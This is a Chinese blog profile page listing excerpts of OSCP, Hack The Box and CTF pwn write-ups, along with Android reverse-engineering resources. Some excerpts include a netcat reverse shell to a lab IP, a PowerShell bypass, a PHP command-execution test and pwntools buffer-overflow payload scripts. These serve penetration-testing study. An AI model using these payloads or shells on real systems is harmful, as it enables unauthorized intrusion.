自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(508)
  • 资源 (12)
  • 论坛 (1)
  • 收藏
  • 关注

原创 oscp练习目录

0x00 前言这里将oscp所做的练习进行一个总结,并且将每一个题所需要的内容以及可以练习学习到的东西进行汇总。0x01 vulnhub总览题目链接文章链接Me and My Girlfriend 1https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/https://blog.csdn.net/qq_36...

2020-01-25 18:06:41 10941

原创 Web学习指南

0x00 前言漏洞不分先后顺序0x01 漏洞库1.源码泄露svn源码泄露(https://blog.csdn.net/qq_36869808/article/details/88544881)git源码泄露

2019-03-29 15:52:11 10374

原创 python实用手册

python命令行执行https://blog.csdn.net/qq_36869808/article/details/87935350python开多线程https://blog.csdn.net/qq_36869808/article/details/88114543python爬虫随机head头https://blog.csdn.net/qq_36869808/article/d...

2019-03-25 15:16:59 38238

原创 cve

cve编号时间备注cve-2018-206802019-01-092018年末提交的现在才通过CVE-2018-205202018-12-27CVE-2018-204482018-12-25cve-2018-20680CVE-2018-20520CVE-2018-20448...

2019-01-10 10:14:58 502

原创 CMS代码审计目录

0x00 前言之前的目录出现了一定的逻辑问题,所以只好重写弄一个cms代码审计的目录。https://blog.csdn.net/qq_36869808/article/details/830299800x01 CMSweb渗透测试练习——熊海cms V1.0...

2018-12-03 09:30:12 427

原创 CTF合集

0x00 前言总计记录我在CTF的道路0x01 练习1.Bugku1.1 杂项Bugku-闪的好快 601.2 webBugku-we5 60Bugku-头等舱Bugku-网站被黑Bugku-管理员系统Bugku-web40x02 资源在线编码字母url编码...

2018-10-25 11:48:50 1806

原创 本心

我想要带你,看看我们没有看过的天空,我们没有看过的大海,我们没有生活过的城市,我们没有看过的风景。我想要带你去我们没有见过的世界,听我们没有听过的故事,一起听别人讲述他们的故事。想带你去看没有看过的电影,听没有听过的歌,哼乱七八糟的调调。我想要带你去我们原本没有办法到达的地方。你是否愿意。我学习的东西,我努力的东西,我坚信的东西,或许都在乎于此,我想追求坚强,勇敢,善良,自信,尊严,做一...

2018-10-19 10:24:25 260 1

原创 代码审计文章资源汇总

0x00 前言如饥似渴的学习。0x01 文章0x02 资源1.DVWAhttps://www.lanzous.com/i236f2d

2018-10-12 17:06:51 2119

原创 HAI_使用手册 更新时间2019年6月19日16:59:46

如何赚钱?当然是要。逆向学习戳我有惊喜 这个是我整理的系列文章的导航,希望一起进步开发学习正在更新练习戳我有惊喜 这个是练习demo的整合,之后的更新也会在这里工具工欲善其事,必先利其器。工具我暂时还没有整理。看心情辅助文档看到大部分的图片链接失效,可能是因为自身原因。所以特与2018年2月25日11:47:00,开始整理成w...

2018-02-25 11:47:37 2354

原创 Android逆向之博客目录导航

0x00 前言说明提供一个目录索引。内容Android逆向之 JAVA基础系列 Android逆向之Android基础系列 Android逆向之Python基础系列 Android逆向之Android进阶系列0x01 Android逆向之Java基础说明java系列主要是为了复习一下java基本语法,最主要的目的还是为了研究一下class文件 当然还...

2018-02-06 14:24:45 8863 3

原创 oscp——htb——Mirai

0x00 前言这道题感觉很多人做了,应该不会很难,所以找找自信,来试试这道题0x01 信息收集

2020-08-06 19:22:30 111

原创 oscp——htb—— Nineveh

0x00 前言0x01 信息收集0x02 过程看到页面突然想起这个题之前应该是做过的。这里全程可以参考这个https://blog.csdn.net/qq_36869808/article/details/104094830

2020-08-05 20:30:51 54

原创 oscp——bof——brainpan

0x00 前言学习brainpan,这个是看了前辈的教程才做出来的。前辈地址:https://blog.csdn.net/zhalang8324/article/details/904775240x01 Wp看了oscp的教程但是感觉始终不得其道,所以想要练习练习。总结了一下流程,emmm基本就是以下流程确定偏移量确定JMP ESP确定badcharshellcode加上其实还是有很多疑问的这里ida看到了这个跟进,发现是一个strcpy的缓存区溢出但是有一个问题就是,这里

2020-08-04 10:52:22 77

原创 oscp——htb——Blocky

0x00 前言0x01 信息收集0x02 Web——Webshell这个机子是我第一次遇到这种,也算是涨经验了吧看到是一个wp的站,马上使用wpscan这里知道了一个新的东西http://10.10.10.37/plugins/ 这个文件夹下居然有东西看一下jar包,发现账号密码,根据wp的扫描用户 notch进行登录使用 notch/8YsqfCTnvxAUeduzjNSXe22 登录0x02 Webshell——Rootshell...

2020-08-03 16:11:07 60

原创 oscp——htb——Calamity(只做了一半)

0x00 前言0x01 信息收集这里开了80端口0x02 Web——Webshell扫目录发现一个admin账号然后狗的是F12可以获取到密码????然后登录成功admin/skoupidotenekes这里可以执行一个php文件<?php system("id")?>...

2020-08-01 17:07:07 58

原创 jarvisoj——Test Your Memory

题目Wp基本项检查,32位,开了NX,got表可写这里看到alphanum_2626和mem_test跟进mem_test,可以看到是scanf这里可以看到偏移,直接上payload这里一定要有返回地址,不然程序奔溃之后看不到flagfrom pwn import *sh = remote("pwn2.jarvisoj.com",9876)e=ELF('./TestYourMemory')sys_addr=e.symbols['system']cat_flag_addr=e

2020-07-31 13:07:24 57

原创 jarvisoj——Guess

题目Wp查一下基础项这道题卡了很久,实际上最核心的是 char数组 129时=-1前面这些通过socket进行连接,和主题无关看到head可以看到这里才是关键的地方看到这里可以知道,实际上就是把bin_by_hex值和flag进行对比内存中bin_by_hex和flag相差0x40我们可以通过char数组溢出的方法进行查看falg,129=-1,依次类推然后再对flag进行爆破from pwn import *io = remote('pwn.jarvisoj.com',

2020-07-30 15:40:33 34

原创 oscp——htb——Europa

0x00 前言0x01 信息收集0x02 Web——Webshell

2020-07-27 17:48:02 33

原创 oscp——htb——Bank

0x00 前言0x01 信息收集0x02 Web——Webshell这里看到53 DNS开放,而且web是apache默认页面,应该是要进行一个域名的绑定。这里为什么是bank.htb,我也不知道为啥,找了半天也没找到缘由。10.10.10.29 bank.htb www.bank.htb ns.bank.htb chris.bank.htb这里跑目录发现一个http://bank.htb/support.php访问一下,将302改为200这里从burp来看可以看的很清楚这里上

2020-07-21 11:40:31 80

原创 oscp——htb——Haircut

0x00 前言0x01 信息收集0x02 Web——Webshell访问看到这种10个有9个要扫目录,找到了一个exposed.php这里可以看到执行了一个curl的命令上一个马。拿到一个shell0x03 Webshell——RootShell获取一下suid,看到一个screen,这个之前vulhub做过一次,有笔记。提权www-data@haircut:/tmp$ cd /etcwww-data@haircut:/etc$ chmod +x /tmp/root

2020-07-20 10:43:21 58

原创 jarvisoj——[XMAN]]level2(x64)

题目Wp这里检查一下基础项这里看了一下,发现还是read这里出现了问题,需要进行覆盖构造一下payloadfrom pwn import *r=process("./level2_x64")#r=remote('pwn2.jarvisoj.com',9882)e=ELF('./level2_x64')sys_addr=e.symbols['system']bin_addr=e.search("/bin/sh").next()pop_rdi=0x4006b3payload='

2020-07-19 17:36:04 56

原创 jarvisoj——[XMAN]level4

题目Wp检查基础项,有NX保护ida看的时候还是之前的那种,但是没有给lib,需要自己去找那么这里第一步,肯定是找到system的地址第二步将/bin/sh写入bss字段第三部调用即可

2020-07-19 17:35:05 59

原创 jarvisoj——[XMAN]level3

题目Wp查一下常规,开了NX,NX开了之后就不能执行自己的shellcode了。ida看一下,依旧是这里存在缓存区溢出首先填充字段就是’A’*88+‘B’*4然后找到system的地址 00040310readelf -s libc-2.19.so |grep system返回地址随便,现在找参数bin,现在可以看到是162d4cstrings -atx libc-2.19.so |grep /bin现在还需要使用write来读出真实的offectfrom pwn imp

2020-07-19 17:33:49 44

原创 jarvisoj——[XMAN]level2

题目Wp查一下基础项,32位的,开了NX保护,开了NX就没法执行自己的shellcode了。ida看一下常规的调用,然后看vulnerable_function函数很明显的read缓存区溢出,溢出大小为0x88很好玩的是这个题中有/bin/sh,地址为0x0804A024最后溢出结果就是0x88*‘A’(缓存地址)+0x4*‘A’(返回地址)+函数地址+函数返回地址+参数那么最后脚本就是:from pwn import *sh=remote("pwn2.jarvisoj.co

2020-07-16 02:53:07 45

原创 jarvisoj——[XMAN]level1

题目Wp先查一下基本的内容可以看到 RELRO: Partial RELRO就是got表可写的意思,然后ida接着看看源码,这里就是说调用了一个无参的函数这里看到很明显的是一个溢出,但是这里没有shellcode,就需要自己写一个了这里可以看到print打印了buf的地址这里写一个pwntools的脚本from pwn import *sh = remote("pwn2.jarvisoj.com",9877)shellcode = asm(shellcraft.i386.

2020-07-15 01:00:10 61

原创 jarvisoj——[XMAN]level0

题目Wp拿下来之后发现是一个64位的,直接开idamain函数,现在对main函数已经很熟悉了这里看到一个方法这里按照规则覆盖即可。脚本from pwn import *sh=remote("pwn2.jarvisoj.com","9881")data="A"*136+p64(0x400596)sh.sendline(data)sh.interactive()sh.close()...

2020-07-14 23:26:18 88

原创 jarvisoj——Tell Me Something

本来想做其他的平台,但是搜了一下还是这个平台比较适合入门。题目Wp这里首先下载,然后ida打开,看到main函数main函数说的实际上就是有一个保存的栈大小为136,但是确允许输入256栈大小的内容,这里存在栈溢出的问题。然后这里可以看到有一个good_gaem可以看到是读取了一个flag.txt的文件。那么需要做的就是先覆盖,这里我自己感觉的是,覆盖先将自身拉满,然后加返回地址直接覆盖就行。最后就是先覆盖136的自身,然后加上good_game的地址即可。pwntoolsfro

2020-07-14 23:24:38 103

原创 oscp——htb——Joker

0x00 前言这个机子可以了解到Squid相关的知识,如果不是这个机子,我可能都不可能会接触到这个东西。0x01 信息收集0x02 Web——Webshell这里有一个3128开放,我找了历史漏洞但是都没有利用成功。最后才知道可以将3128当做代理。但是我linux本地又有问题,所以只能使用ew进行端口的正向映射出来。但是代理挂好之后要求输入密码,那么这里要从另外一个方面入手了。使用tftp进行连接然后获取squid相关内容/etc/squid/squid.conf/etc/squ

2020-07-14 17:37:42 150

原创 oscp——htb——Sneaky(未完成待续)

0x00 前言0x01 信息收集扫目录可以发现一个dev0x02 Web访问之后发现是一个登录界面,使用万能密码发现可以直接进去这里得到两个账号admin,thrasivoulos点击my key,可以得到一个私钥但是机器没有开启22ssh,好了我自己走到这里就卡死了。...

2020-07-07 14:57:42 74

原创 oscp——htb——Lazy

0x00 前言0x01 信息收集0x02 Web

2020-06-29 17:06:21 2022

原创 oscp——htb——Brainfuck(环境问题,未完待续)

0x00 前言0x01 信息收集root@kali:~# nmap 10.10.10.17Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-29 01:06 EDTNmap scan report for brainfuck.htb (10.10.10.17)Host is up (0.29s latency).Not shown: 995 filtered portsPORT STATE SERVICE22/tcp open

2020-06-29 13:47:11 154

原创 oscp——htb——Tenten

0x00 前言0x01 信息收集0x02 Web——USershell首先来看下80端口的内容,可以看到是一个wp的站点使用wpscan扫描获取到一个插件job-manager,还有一个用户名:takis暂时无可利用的地方,这个看到这里发现如下的内容这里看到8,应该是可以遍历的使用burp进行遍历,发现在13的地方出现问题,这种应该是参数13的意思这里知道有一个job-manager的洞,CVE-2015-6668,找到了文件的路径http://10.10.10.10/wp

2020-06-16 16:40:07 124

原创 oscp——HTB——Cronos

0x00 前言0x01 信息收集0x02 Web——Webshell这里开放了80端口,发现80端口没啥东西,扫目录也没扫出来啥。看到开放了53端口,知道是开启了dns服务使用nslookupnslookupserver 10.10.10.1310.10.10.13这类可以看到10.10.10.13的相对应的域名查看一下其他的域名dig axfr cronos.htb @10.10.10.13这里可以看到还有其他的域测试admin.cronos.htb,发现这里是一个

2020-06-02 16:02:42 124

原创 oscp——HTB——Optimum

0x00 前言难度入门1级0x01 信息收集0x02 Web——Webshell访问一下目标站点,看到是HFS搜一下payload发现可以直接使用msf打过去拿到shell之后就可以拿到user的flag这里我用cs又建立了一个稳定的连接0x03 Webshell——Rootshell首先systeminfo获取一下信息,然后使用Windows-Exploit-Suggester进行扫描使用MS16-098进行提权...

2020-05-25 17:26:38 139

原创 oscp——HTB——Bastard

0x00 前言难度入门1级0x01 信息收集0x02 Web——Webshell这里访问之后看到是一个Drupal的站,Drupal的站在7.0可以直接直接getshell使用脚本直接getshell0x03 Webshell——Rootshell传一个nc 上去然后反弹一个shellnc.exe -e cmd 10.10.14.6 1234这里可以使用Sherlock先进行扫描。powershell.exe -exec bypass -Command "& {Imp

2020-05-20 20:40:32 206

原创 oscp——HTB——Devel

0x00 前言难度入门1级0x01 信息收集这里可以看到开了21和80扫一下21,由于我这里有一点问题,所以21得重新扫一下0x02 21——Webshell本来以为是通过80扫目录然后搞进去。。。但是最后扫了半天发现扫错了。发现是通过21搞进去的。可以看到是匿名访问。所以直接使用ftp连接。这里可以看到ftp的目录可能是和web目录一致的访问test.txt进行测试这里使用msf生成一个aspx的马,然后直接put上传msf监听,访问cs.aspx会弹回来一个shell

2020-05-19 15:55:00 101

原创 oscp——HTB——Beep

0x00 前言难度入门1级0x01 信息收集0x02 Web——Rootshell先看一下80端口,是一个登录界面,尝试了弱口令以及SQL注入搜索一下Elastix的历史漏洞首先看到了一个LFI的洞,下载下来,然后看一下利用payload进行测试这里找到了一个admin的密码jEhdIekWmdjE可以尝试登录一下ssh,原本先尝试的admin,但是失败了,又尝试了下root,就可以成功的连接上了。...

2020-05-09 15:24:58 173

原创 oscp——HTB——Popcorn

0x00 前言难度入门2级0x01 信息收集这里开放了22和800x02 Web——Webshell看到这里是一个test,果断扫目录。拿到目录:http://10.10.10.6/testhttp://10.10.10.6/torrent/先看一下test,phpinfo的界面访问http://10.10.10.6/torrent/ 可以看到是一个torrent的站,先注册一个账号然后上传一个torrent然后这里上传成功这里上传文件,并使用burp拦截,并且修改

2020-05-09 14:32:12 211

原创 oscp——HTB——Legacy

0x00 前言乘着网好,赶紧做一做。难度入门 1级 (基本没啥难度)0x01 信息收集常规上nmap看了一下目标版本,这里是2003看到这里看到445以及版本,永恒之蓝没得跑了。0x02 usershell and rootshell可以直接开启msf,进行搜索search smb获取到shell首先是找到user.txt然后找到root.txt...

2020-04-26 15:25:05 136

原创 oscp——HTB——Postman

0x00 前言这个是第一个做的hackthebox的机子,由于这个做出来的人数比较多,所以选择了这个,不知道难度怎么样,决定做一做。0x01 实验1.信息收集(端口)这里由于不掌技巧,所以扫描花费了很久。。。。这里可以看到开放了,22,80,6379,10000所以指定扫描一下2.攻击尝试2.1 端口攻击尝试这里肯定是要先考虑一下redis,毕竟有一个未授权访问然后redi...

2020-04-13 13:22:10 950 6

Termite-20180926 版本.zip

原作者已经下架,版本:free 1.8.4,卖的太贵了,哪有那么多的积分。。。。所以还是低一点比较好

2020-03-25

win10 64位 comctl32

win10 64位 comctl32,可解决comctl32缺失的问题,具体操作可以看我的博客,博客中有写如果利用。

2019-12-16

小白的hook武器

小白的Hook武器,用来搭建环境,满足自身需求,才能继续学习

2018-03-13

Dex文件头结构解析器

dex作为Android平台下的exe是一个非常重要的文件。所以分析就有了必要。 dex作为Android平台下的exe是一个非常重要的文件。所以分析就有了必要。

2018-03-05

文件分析资料

elf文件分析的资料,包括代码还有其他的demo进行测试。

2018-03-04

signapk.jar

signapk.jar这个jar包是Android进行签名的一个文件,通过分析signapk.jar来研究签名的过程。

2018-01-31

class文件分析

Android逆向-java,dex文件分析软件,是为了学习class文件的时候进行辅助的一个脚本,希望可以帮助到一些学习java的人。

2018-01-15

Android逆向-java代码基础(4)

Android逆向-java代码基础(4)是和Android逆向-java代码基础(4)博文相匹配的资源文件

2018-01-09

Android逆向-java代码基础(3)

Android逆向-java代码基础(3)是为了Android逆向-java代码基础(3)博客所提供的demo所上传的

2018-01-09

Android逆向-java代码基础(2)

这份文件是关于java代码基础的练习的小demo,可以下载进行学习。

2018-01-09

Android逆向-java代码基础(1)

这个是博客里专用的代码还有一些文件的集合,配合使用到博客地址:http://blog.csdn.net/qq_36869808/article/details/78986787

2018-01-06

Java核心技术 卷1 基础知识 第9版

JAVA核心技术,Android开发的基础,这本书非常适合入门。

2018-01-05

Bubble_zhu的留言板

发表于 2020-01-02 最后回复 2020-01-02

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除